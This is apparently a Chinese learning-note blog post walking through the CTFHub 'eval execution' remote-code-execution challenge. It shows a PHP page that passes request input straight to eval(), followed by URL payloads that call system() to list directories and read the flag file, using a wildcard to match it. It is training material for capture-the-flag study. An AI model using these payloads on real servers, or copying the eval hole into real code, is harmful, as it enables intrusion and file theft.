CTFHub 技能树 Web RCE eval执行(学习记录)

eval执行

源代码

php 复制代码
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
叩码以求索4 小时前
三维建模:SolidWorks 2025保姆级下载与安装教程指南
学习·数学建模
zhangrelay6 小时前
消费电子原装锂电池服役8–20年且健康度>40%公开实测案例完整调研分析报告
笔记·学习
tyqtyq226 小时前
HarmonyOS AI 应用开发实战:简历项目经历改写系统
人工智能·学习·华为·生活·harmonyos
bush49 小时前
正点原子imx6ull-uboot,奇怪的问题
linux·学习
念雨思9 小时前
HarmonyOS AI 应用开发实战:短视频选题灵感 —— AI 驱动的内容创作引擎
人工智能·学习·华为·harmonyos·鸿蒙
2601_9593832411 小时前
休学干预的“信任难题”,坤和静界·春藤计划怎么尝试破局
学习
tyqtyq2213 小时前
HarmonyOS AI 应用开发实战:考研择校分析系统
人工智能·学习·考研·华为·生活·harmonyos
光影62713 小时前
MySQL基础入门
数据库·笔记·sql·学习·mysql·学习方法
海兰13 小时前
【实用程序】网页公开信息智能采集系统详细设计指南
人工智能·学习·自动化·采集信息
MartinYeung513 小时前
[论文学习]AgentDAM:自主Web Agent的隐私泄露评估
学习